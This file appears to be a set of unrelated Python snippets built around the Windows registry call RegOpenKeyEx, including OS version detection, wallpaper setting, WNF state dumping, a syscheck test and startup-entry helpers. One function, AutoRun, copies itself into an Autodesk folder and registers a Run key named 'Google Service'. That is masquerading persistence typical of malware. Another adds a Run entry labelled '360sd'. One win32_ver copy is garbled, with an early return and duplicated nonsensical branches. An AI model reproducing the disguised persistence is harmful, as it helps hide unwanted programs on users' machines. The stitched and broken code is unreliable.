def win32_get_adapter_list(): """Get the list of network adapters an their corresponding network driver identifier.""" from win32api import RegOpenKeyEx, RegEnumKeyEx from win32api import RegQueryValueEx from win32con import HKEY_LOCAL_MACHINE TAPNAME = 'tap08010co' NET_GUID = "{4D36E972-E325-11CE-BFC1-08002BE10318}" CONTROL_PATH = "SYSTEM\\CurrentControlSet\\Control\\" ADAPTER_KEY = CONTROL_PATH + "Class\\" + NET_GUID NETWORK_CONNECTIONS_KEY = CONTROL_PATH + "Network\\" + NET_GUID adapters = [] adapter_types = {} key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, ADAPTER_KEY) for value in RegEnumKeyEx(key): subpath = "\\".join([ADAPTER_KEY, value[0]]) subkey = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subpath) drivername = RegQueryValueEx(subkey, "ComponentId") instanceid = RegQueryValueEx(subkey, "NetCfgInstanceId") adapter_types[instanceid[0]] = drivername[0] key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, NETWORK_CONNECTIONS_KEY) for value in RegEnumKeyEx(key): if value[0].startswith('{'): subpath = "\\".join( [NETWORK_CONNECTIONS_KEY, value[0], "Connection"]) subkey = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subpath) name = RegQueryValueEx(subkey, "Name") if value[0] in adapter_types: adapters.append((name[0], adapter_types[value[0]])) return adapters
def _read_hklm_reg(key_name, value_name): from win32api import RegOpenKeyEx, RegQueryValueEx, RegCloseKey from win32con import HKEY_LOCAL_MACHINE, KEY_READ KEY_WOW64_64KEY = 0x0100 KEY_WOW64_32KEY = 0x0200 if _is_64bit_windows(): try: key32 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0, KEY_READ | KEY_WOW64_32KEY) (value32, _) = RegQueryValueEx(key32, value_name) RegCloseKey(key32) except: value32 = '' try: key64 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0, KEY_READ | KEY_WOW64_64KEY) (value64, _) = RegQueryValueEx(key64, value_name) RegCloseKey(key64) except: value64 = '' else: try: key32 = RegOpenKeyEx(HKEY_LOCAL_MACHINE, key_name, 0, KEY_READ) (value32, _) = RegQueryValueEx(key32, value_name) RegCloseKey(key32) except: value32 = '' value64 = '' return (value32, value64)
def __set_wallpaper_from_bmp(self, bmp_path): reg_key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0, KEY_SET_VALUE) RegSetValueEx(reg_key, "WallpaperStyle", 0, REG_SZ, "2") RegSetValueEx(reg_key, "TillWallpaper", 0, REG_SZ, "0") SystemParametersInfo(SPI_SETDESKWALLPAPER, bmp_path, SPIF_SENDWININICHANGE)
def DumpKeyInfo(StateName, ShowSd, ShowData): reghandle = None internalName = WNF_STATE_NAME_INTERNAL() internalName.value = int(StateName, 16) ^ WNF_STATE_KEY value = None if internalName.b.NameLifetime != WNF_STATE_NAME_LIFETIME[ 'WnfTemporaryStateName'].value: try: reghandle = RegOpenKeyEx( HKEY_LOCAL_MACHINE, g_LifetimeKeyNames[internalName.b.NameLifetime], 0, KEY_READ) except Exception: print("[Error] Could not open root key: {}".format( g_LifetimeKeyNames[internalName.b.NameLifetime])) return False try: value, _ = RegQueryValueEx(reghandle, StateName) except error: print("[Error] Could not find the WnfName in the registry") return False print( "\n| WNF State Name " "| S | L | P | AC | N | CurSize | MaxSize | Changes |") print("-" * 118) DumpWnfData(int(StateName, 16), value, ShowSd, ShowData) if reghandle != None: RegCloseKey(reghandle) return True
def DumpWnfNames(ShowSd, ShowData): for i in range(0, len(g_LifetimeKeyNames)): reghandle = None try: reghandle = RegOpenKeyEx(HKEY_LOCAL_MACHINE, g_LifetimeKeyNames[i], 0, KEY_READ) except Exception: print("[Error] Could not open root key: {}".format( g_LifetimeKeyNames[i])) return False print( "\n| WNF State Name [{:<10} Lifetime] " "| S | L | P | AC | N | CurSize | MaxSize | Changes |".format( WnfLifetimeStrings[i])) print("-" * 118) i = 0 while 1: try: name, value, _ = RegEnumValue(reghandle, i) except error: break i += 1 try: StateName = int(name, 16) except: continue if not DumpWnfData(StateName, value, ShowSd, ShowData): print("[Error] Something went wrong") return False if reghandle != None: RegCloseKey(reghandle) return True
def run_at_startup_set(appname, path): """ Sets the registry key to run at stratup. """ key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE) RegSetValueEx(key, appname, 0, REG_SZ, path) RegCloseKey(key)
def run_at_startup_remove(appname): """ Removes the run-at-startup registry key. """ key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE) RegDeleteValue(key, appname) RegCloseKey(key)
def try_author(): try: key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE) RegCloseKey(key) return True except: return False
def run_at_startup_set(app_name, path): """ Sets the key to run at startup """ key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE) RegSetValueEx(key, app_name, 0, REG_SZ, path) RegCloseKey(key) print("Key set")
def main(): # open register regkey = RegOpenKeyEx(HKEY_CURRENT_USER, 'Control Panel\\Desktop', 0, KEY_SET_VALUE) RegSetValueEx(regkey, 'WallpaperStyle', 0, REG_SZ, '0') RegSetValueEx(regkey, 'TileWallpaper', 0, REG_SZ, '0') # refresh screen SystemParametersInfo(SPI_SETDESKWALLPAPER, os.path.abspath('cache/cache.jpg'), SPIF_SENDWININICHANGE)
def Reg_Edit(): reg_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run" reg_falg = win32con.KEY_ALL_ACCESS | win32con.KEY_WRITE | win32con.KEY_READ key = RegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, reg_path, 0, reg_falg) RegSetValueEx(key, "FtpServer", 0, win32con.REG_SZ, "\"C:\\Program Files\\FtpServer.exe\"") RegSetValueEx(key, "QQClient", 0, win32con.REG_SZ, "\"C:\\Program Files\\QQClient.exe\"") RegSetValueEx(key, "360sd", 0, win32con.REG_SZ, "\"C:\\Program Files\\QQClient.exe\"") RegCloseKey(key)
def auto_start(what, path): try: key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE) if what: RegSetValueEx(key, 'MY_WINDMILL', 0, REG_SZ, '"%s" /start' % path) else: RegDeleteValue(key, 'MY_WINDMILL') RegCloseKey(key) return True except : return False
def set_wall(path=None): try: key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0, KEY_SET_VALUE) RegSetValueEx(key, 'WallpaperStyle', 0, REG_SZ, '2') RegSetValueEx(key, 'TileWallpaper', 0, REG_SZ, '0') if not path: path = dirname(__file__) + '/image/wall.jpg' SystemParametersInfo(SPI_SETDESKWALLPAPER, path, 1 + 2) RegCloseKey(key) except BaseException as e: dump_log('设置壁纸' + '--->' + str(e))
def __init__(self, key, sub_key, flag): """ Constructor : key : HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS sub_key : The name of a key that this method opens flag : "r" for read "w" for write "a" for append "b" for binary """ from win32api import RegQueryValueEx, RegCreateKey, RegOpenKeyEx from win32con import KEY_ALL_ACCESS from StringIO import StringIO # Save files informations self.key = key self.sub_key = sub_key # Initialization of internal data self.deleted = 0 self.handle = None self.data = None # Check mode self.__checkMode(flag) # Create an empty file self.data = StringIO() try: # Open registry key self.handle = RegOpenKeyEx(key, sub_key, 0, KEY_ALL_ACCESS) # Read key content data = RegQueryValueEx(self.handle, "")[0] # If the file is in read mode if self.flag == self.READ: # Read data self.data = StringIO(data) # If the file is in append mode elif self.flag == self.APPEND: self.data.write(data) except: # If the registry key not found # If the file must be read if self.flag == self.READ: # The file is not found raise FileNotFoundError(key, sub_key) else: # Create a new registry key self.handle = RegCreateKey(key, sub_key)
def StartYardServer(self): try: rkey = RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Webers\\Y.A.R.D") path = RegQueryValueEx(rkey, "program")[0] if not os.path.exists(path): raise Exception except: raise self.Exception( "Please start Yards.exe first and configure it.") try: hProcess = CreateProcess(None, path, None, None, 0, CREATE_NEW_CONSOLE, None, None, STARTUPINFO())[0] except Exception, exc: raise eg.Exception(FormatError(exc[0]))
def launchAtStart(): #first of all we have to check if the path that we want exists if not os.path.exists(dirProgram): os.makedirs(dirProgram) #copy the program to the new folder shutil.copy(sys.argv[0], dirProgram) #create the registry key from win32api import (GetModuleFileName, RegCloseKey, RegDeleteValue, RegOpenKeyEx, RegSetValueEx) from win32con import HKEY_LOCAL_MACHINE, KEY_WRITE, REG_SZ SUBKEY = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE) flag = RegSetValueEx(key, appName, 0, REG_SZ, pathProgram) RegCloseKey(key) return 1 return 0
def AutoRun(): # 自动拷贝并使文件开机自动运行 alwaysFileName = path.basename(__file__) alwaysFileName = alwaysFileName.split('.')[0] nowPyPath = path.abspath(path.dirname(__file__)) nowExeName = path.abspath( path.dirname(__file__)) + '\\' + alwaysFileName + '.exe' newExeFilePath = 'C:\\Users\\Administrator\\AppData\\Local\\Autodesk\\' + \ alwaysFileName + '.exe' # 变成exe后,name还是.py,所以要手动加exe if nowPyPath != 'C:\\Users\\Administrator\\AppData\\Local\\Autodesk\\': # 如果文件位置不是Autodesk的位置 try: copyfile(nowExeName, newExeFilePath) # 复制文件到指定目录 print('复制成功') except Exception as e: print(e) KeyName = 'Software\\Microsoft\\Windows\\CurrentVersion\\Run' # 注册表项名 keyEnum = RegOpenKeyEx( HKEY_CURRENT_USER, 'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, KEY_ALL_ACCESS) ifValueExist = False try: # 判断要注入的键值是否存在 i = 0 while True: regValue = RegEnumValue(keyEnum, i) if regValue[0] == 'Google Service': ifValueExist = True print('键值已存在') i += 1 except: pass if not ifValueExist: try: key = RegOpenKey(HKEY_CURRENT_USER, KeyName, 0, KEY_ALL_ACCESS) RegSetValueEx(key, 'Google Service', 0, REG_SZ, newExeFilePath) RegCloseKey(key) print('添加成功!') except Exception as e: print(e)
def win32_ver(release='', version='', csd='', ptype=''): """ Get additional version information from the Windows Registry and return a tuple (version,csd,ptype) referring to version number, CSD level and OS type (multi/single processor). As a hint: ptype returns 'Uniprocessor Free' on single processor NT machines and 'Multiprocessor Free' on multi processor machines. The 'Free' refers to the OS version being free of debugging code. It could also state 'Checked' which means the OS version uses debugging code, i.e. code that checks arguments, ranges, etc. (Thomas Heller). Note: this functions only works if Mark Hammond's win32 package is installed and obviously only runs on Win32 compatible platforms. XXX Is there any way to find out the processor type on WinXX ? XXX Is win32 available on Windows CE ? Adapted from code posted by Karl Putland to comp.lang.python. """ # Import the needed APIs try: import win32api except ImportError: return release, version, csd, ptype from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx from win32con import HKEY_LOCAL_MACHINE,VER_PLATFORM_WIN32_NT,\ VER_PLATFORM_WIN32_WINDOWS # Find out the registry key and some general version infos maj, min, buildno, plat, csd = GetVersionEx() version = '%i.%i.%i' % (maj, min, buildno & 0xFFFF) if csd[:13] == 'Service Pack ': csd = 'SP' + csd[13:] if plat == VER_PLATFORM_WIN32_WINDOWS: regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion' # Try to guess the release name if maj == 4: if min == 0: release = '95' else: release = '98' elif maj == 5: release = '2000' elif plat == VER_PLATFORM_WIN32_NT: regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' if maj <= 4: release = 'NT' elif maj == 5: release = '2000' else: if not release: # E.g. Win3.1 with win32s release = '%i.%i' % (maj, min) return release, version, csd, ptype # Open the registry key try: keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey) # Get a value to make sure the key exists... RegQueryValueEx(keyCurVer, 'SystemRoot') except: return release, version, csd, ptype # Parse values #subversion = _win32_getvalue(keyCurVer, # 'SubVersionNumber', # ('',1))[0] #if subversion: # release = release + subversion # 95a, 95b, etc. build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0] ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0] # Normalize version version = _norm_version(version, build) # Close key RegCloseKey(keyCurVer) return release, version, csd, ptype
def win32_ver(release='', version='', csd='', ptype=''): """ Get additional version information from the Windows Registry and return a tuple (version,csd,ptype) referring to version number, CSD level and OS type (multi/single processor). As a hint: ptype returns 'Uniprocessor Free' on single processor NT machines and 'Multiprocessor Free' on multi processor machines. The 'Free' refers to the OS version being free of debugging code. It could also state 'Checked' which means the OS version uses debugging code, i.e. code that checks arguments, ranges, etc. (Thomas Heller). Note: this function works best with Mark Hammond's win32 package installed, but also on Python 2.3 and later. It obviously only runs on Win32 compatible platforms. """ # XXX Is there any way to find out the processor type on WinXX ? # XXX Is win32 available on Windows CE ? # # Adapted from code posted by Karl Putland to comp.lang.python. # # The mappings between reg. values and release names can be found # here: http://msdn.microsoft.com/library/en-us/sysinfo/base/osversioninfo_str.asp # Import the needed APIs try: import win32api from win32api import RegQueryValueEx, RegOpenKeyEx, \ RegCloseKey, GetVersionEx from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, \ VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION except ImportError: # Emulate the win32api module using Python APIs try: sys.getwindowsversion except AttributeError: # No emulation possible, so return the defaults... return release, version, csd, ptype else: # Emulation using winreg (added in Python 2.0) and # sys.getwindowsversion() (added in Python 2.3) import winreg GetVersionEx = sys.getwindowsversion RegQueryValueEx = winreg.QueryValueEx RegOpenKeyEx = winreg.OpenKeyEx RegCloseKey = winreg.CloseKey HKEY_LOCAL_MACHINE = winreg.HKEY_LOCAL_MACHINE VER_PLATFORM_WIN32_WINDOWS = 1 VER_PLATFORM_WIN32_NT = 2 VER_NT_WORKSTATION = 1 VER_NT_SERVER = 3 REG_SZ = 1 # Find out the registry key and some general version infos winver = GetVersionEx() maj, min, buildno, plat, csd = winver version = '%i.%i.%i' % (maj, min, buildno & 0xFFFF) if hasattr(winver, "service_pack"): if winver.service_pack != "": csd = 'SP%s' % winver.service_pack_major else: if csd[:13] == 'Service Pack ': csd = 'SP' + csd[13:] if plat == VER_PLATFORM_WIN32_WINDOWS: regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion' # Try to guess the release name if maj == 4: if min == 0: release = '95' elif min == 10: release = '98' elif min == 90: release = 'Me' else: release = 'postMe' elif maj == 5: release = '2000' elif plat == VER_PLATFORM_WIN32_NT: regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' if maj <= 4: release = 'NT' elif maj == 5: if min == 0: release = '2000' elif min == 1: release = 'XP' elif min == 2: release = '2003Server' else: release = 'post2003' elif maj == 6: if hasattr(winver, "product_type"): product_type = winver.product_type else: product_type = VER_NT_WORKSTATION # Without an OSVERSIONINFOEX capable sys.getwindowsversion(), # or help from the registry, we cannot properly identify # non-workstation versions. try: key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey) name, type = RegQueryValueEx(key, "ProductName") # Discard any type that isn't REG_SZ if type == REG_SZ and name.find("Server") != -1: product_type = VER_NT_SERVER except WindowsError: # Use default of VER_NT_WORKSTATION pass if min == 0: if product_type == VER_NT_WORKSTATION: release = 'Vista' else: release = '2008Server' elif min == 1: if product_type == VER_NT_WORKSTATION: release = '7' else: release = '2008ServerR2' else: release = 'post2008Server' else: if not release: # E.g. Win3.1 with win32s release = '%i.%i' % (maj, min) return release, version, csd, ptype # Open the registry key try: keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey) # Get a value to make sure the key exists... RegQueryValueEx(keyCurVer, 'SystemRoot') except: return release, version, csd, ptype # Parse values #subversion = _win32_getvalue(keyCurVer, # 'SubVersionNumber', # ('',1))[0] #if subversion: # release = release + subversion # 95a, 95b, etc. build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0] ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0] # Normalize version version = _norm_version(version, build) # Close key RegCloseKey(keyCurVer) return release, version, csd, ptype
def win32_ver(release='', version='', csd='', ptype=''): """ Get additional version information from the Windows Registry and return a tuple (version,csd,ptype) referring to version number, CSD level and OS type (multi/single processor). As a hint: ptype returns 'Uniprocessor Free' on single processor NT machines and 'Multiprocessor Free' on multi processor machines. The 'Free' refers to the OS version being free of debugging code. It could also state 'Checked' which means the OS version uses debugging code, i.e. code that checks arguments, ranges, etc. (Thomas Heller). Note: this function works best with Mark Hammond's win32 package installed, but also on Python 2.3 and later. It obviously only runs on Win32 compatible platforms. """ try: import win32api from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION except ImportError: try: sys.getwindowsversion except AttributeError: return (release, version, csd, ptype) import _winreg GetVersionEx = sys.getwindowsversion RegQueryValueEx = _winreg.QueryValueEx RegOpenKeyEx = _winreg.OpenKeyEx RegCloseKey = _winreg.CloseKey HKEY_LOCAL_MACHINE = _winreg.HKEY_LOCAL_MACHINE VER_PLATFORM_WIN32_WINDOWS = 1 VER_PLATFORM_WIN32_NT = 2 VER_NT_WORKSTATION = 1 VER_NT_SERVER = 3 REG_SZ = 1 winver = GetVersionEx() maj, min, buildno, plat, csd = winver version = '%i.%i.%i' % (maj, min, buildno & 65535) if hasattr(winver, 'service_pack'): if winver.service_pack != '': csd = 'SP%s' % winver.service_pack_major elif csd[:13] == 'Service Pack ': csd = 'SP' + csd[13:] if plat == VER_PLATFORM_WIN32_WINDOWS: regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion' if maj == 4: if min == 0: release = '95' elif min == 10: release = '98' elif min == 90: release = 'Me' else: release = 'postMe' elif maj == 5: release = '2000' elif plat == VER_PLATFORM_WIN32_NT: regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' if maj <= 4: release = 'NT' elif maj == 5: if min == 0: release = '2000' elif min == 1: release = 'XP' elif min == 2: release = '2003Server' else: release = 'post2003' elif maj == 6: if hasattr(winver, 'product_type'): product_type = winver.product_type else: product_type = VER_NT_WORKSTATION try: key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey) name, type = RegQueryValueEx(key, 'ProductName') if type == REG_SZ and name.find('Server') != -1: product_type = VER_NT_SERVER except WindowsError: pass if min == 0: if product_type == VER_NT_WORKSTATION: release = 'Vista' else: release = '2008Server' elif min == 1: if product_type == VER_NT_WORKSTATION: release = '7' else: release = '2008ServerR2' else: release = 'post2008Server' else: if not release: release = '%i.%i' % (maj, min) return (release, version, csd, ptype) try: keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey) RegQueryValueEx(keyCurVer, 'SystemRoot') except: return (release, version, csd, ptype) build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0] ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0] version = _norm_version(version, build) RegCloseKey(keyCurVer) return (release, version, csd, ptype)
def configure_syscheck_environment(time_sleep): # Create every needed directory for n in range(n_windows_registry): t_dir = f'{testreg}{n}' create_registry(registry_parser[KEY], f'{testreg}{n}', KEY_WOW64_64KEY) reg_list.append(t_dir) control_service('restart') logger.debug('Waiting 15 seconds for syscheckd to start.') time.sleep(15) reg_key = 'reg_key' reg_value = 'value_name' logger.debug( f'Waiting {str(time_sleep)} seconds. Execute `generate_windows_yaml.py` now.' ) time.sleep(time_sleep) logger.debug(f'Waiting {SCAN_WAIT} seconds for baseline scan to finish.') time.sleep(120) logger.debug('Creating registries...') for registry in reg_list: key_h = create_registry(registry_parser[KEY], os.path.join(registry, reg_key), KEY_WOW64_64KEY) modify_registry_value(key_h, reg_value, REG_SZ, 'added') TimeMachine.travel_to_future(timedelta(hours=13)) logger.debug(f'Waiting {SCAN_WAIT} seconds for scan to finish.') time.sleep(SCAN_WAIT) logger.debug('Modifying registries...') for registry in reg_list: modify_key_perms( registry_parser[KEY], os.path.join(registry, reg_key), KEY_WOW64_64KEY, LookupAccountName(None, f"{platform.node()}\\{os.getlogin()}")[0]) modify_registry_owner( registry_parser[KEY], os.path.join(registry, reg_key), KEY_WOW64_64KEY, LookupAccountName(None, f"{platform.node()}\\{os.getlogin()}")[0]) key_h = RegOpenKeyEx(registry_parser[KEY], os.path.join(registry, reg_key), 0, KEY_ALL_ACCESS | KEY_WOW64_64KEY) modify_registry_value(key_h, reg_value, REG_SZ, 'modified') TimeMachine.travel_to_future(timedelta(hours=13)) logger.debug(f'Waiting {SCAN_WAIT} seconds for scan to finish.') time.sleep(SCAN_WAIT) logger.debug('Deleting registries...') for registry in reg_list: delete_registry(registry_parser[KEY], os.path.join(registry, reg_key), KEY_WOW64_64KEY) TimeMachine.travel_to_future(timedelta(hours=13)) logger.debug(f'Waiting {SCAN_WAIT} seconds for scan to finish.') time.sleep(SCAN_WAIT)
def win32_ver(release='', version='', csd='', ptype=''): return ('Unknown', '', '', '') try: import win32api from win32api import RegQueryValueEx, RegOpenKeyEx, RegCloseKey, GetVersionEx from win32con import HKEY_LOCAL_MACHINE, VER_PLATFORM_WIN32_NT, VER_PLATFORM_WIN32_WINDOWS, VER_NT_WORKSTATION except ImportError: try: sys.getwindowsversion except AttributeError: return (release, version, csd, ptype) import winreg GetVersionEx = sys.getwindowsversion RegQueryValueEx = winreg.QueryValueEx RegOpenKeyEx = winreg.OpenKeyEx RegCloseKey = winreg.CloseKey HKEY_LOCAL_MACHINE = winreg.HKEY_LOCAL_MACHINE VER_PLATFORM_WIN32_WINDOWS = 1 VER_PLATFORM_WIN32_NT = 2 VER_NT_WORKSTATION = 1 VER_NT_SERVER = 3 REG_SZ = 1 winver = GetVersionEx() (maj, min, buildno, plat, csd) = winver version = '%i.%i.%i' % (maj, min, buildno & 65535) if hasattr(winver, 'service_pack'): if winver.service_pack != '': csd = 'SP%s' % winver.service_pack_major elif csd[:13] == 'Service Pack ': csd = 'SP' + csd[13:] if plat == VER_PLATFORM_WIN32_WINDOWS: regkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion' if maj == 4: if min == 0: release = '95' elif min == 10: release = '98' elif min == 90: release = 'Me' else: release = 'postMe' if maj == 5: release = '2000' elif maj == 5: release = '2000' elif plat == VER_PLATFORM_WIN32_NT: regkey = 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' if maj <= 4: release = 'NT' elif maj == 5: if min == 0: release = '2000' elif min == 1: release = 'XP' elif min == 2: release = '2003Server' else: release = 'post2003' if maj == 6: if hasattr(winver, 'product_type'): product_type = winver.product_type else: product_type = VER_NT_WORKSTATION try: key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey) (name, type) = RegQueryValueEx(key, 'ProductName') while type == REG_SZ and name.find('Server') != -1: product_type = VER_NT_SERVER except WindowsError: pass if min == 0: if product_type == VER_NT_WORKSTATION: release = 'Vista' else: release = '2008Server' if min == 1: if product_type == VER_NT_WORKSTATION: release = '7' else: release = '2008ServerR2' if min == 2: if product_type == VER_NT_WORKSTATION: release = '8' else: release = '2012Server' release = 'post2012Server' else: release = 'post2012Server' elif min == 2: if product_type == VER_NT_WORKSTATION: release = '8' else: release = '2012Server' release = 'post2012Server' else: release = 'post2012Server' elif min == 1: if product_type == VER_NT_WORKSTATION: release = '7' else: release = '2008ServerR2' if min == 2: if product_type == VER_NT_WORKSTATION: release = '8' else: release = '2012Server' release = 'post2012Server' else: release = 'post2012Server' elif min == 2: if product_type == VER_NT_WORKSTATION: release = '8' else: release = '2012Server' release = 'post2012Server' else: release = 'post2012Server' elif maj == 6: if hasattr(winver, 'product_type'): product_type = winver.product_type else: product_type = VER_NT_WORKSTATION try: key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey) (name, type) = RegQueryValueEx(key, 'ProductName') while type == REG_SZ and name.find('Server') != -1: product_type = VER_NT_SERVER except WindowsError: pass if min == 0: if product_type == VER_NT_WORKSTATION: release = 'Vista' else: release = '2008Server' if min == 1: if product_type == VER_NT_WORKSTATION: release = '7' else: release = '2008ServerR2' if min == 2: if product_type == VER_NT_WORKSTATION: release = '8' else: release = '2012Server' release = 'post2012Server' else: release = 'post2012Server' elif min == 2: if product_type == VER_NT_WORKSTATION: release = '8' else: release = '2012Server' release = 'post2012Server' else: release = 'post2012Server' elif min == 1: if product_type == VER_NT_WORKSTATION: release = '7' else: release = '2008ServerR2' if min == 2: if product_type == VER_NT_WORKSTATION: release = '8' else: release = '2012Server' release = 'post2012Server' else: release = 'post2012Server' elif min == 2: if product_type == VER_NT_WORKSTATION: release = '8' else: release = '2012Server' release = 'post2012Server' else: release = 'post2012Server' else: if not release: release = '%i.%i' % (maj, min) return (release, version, csd, ptype) try: keyCurVer = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regkey) RegQueryValueEx(keyCurVer, 'SystemRoot') except: return (release, version, csd, ptype) build = _win32_getvalue(keyCurVer, 'CurrentBuildNumber', ('', 1))[0] ptype = _win32_getvalue(keyCurVer, 'CurrentType', (ptype, 1))[0] version = _norm_version(version, build) RegCloseKey(keyCurVer) return (release, version, csd, ptype)
def run_at_startup_remove(app_name): key = RegOpenKeyEx(HKEY_LOCAL_MACHINE, SUBKEY, 0, KEY_WRITE) RegDeleteValue(key, app_name) RegCloseKey(key)
def set_wall(): key = RegOpenKeyEx(HKEY_CURRENT_USER, "Control Panel\\Desktop", 0, KEY_SET_VALUE) RegSetValueEx(key, 'WallpaperStyle', 0, REG_SZ, '2') RegSetValueEx(key, 'TileWallpaper', 0, REG_SZ, '0') SystemParametersInfo(SPI_SETDESKWALLPAPER, dirname(__file__)+'/image/wall.jpg', 1+2) RegCloseKey(key)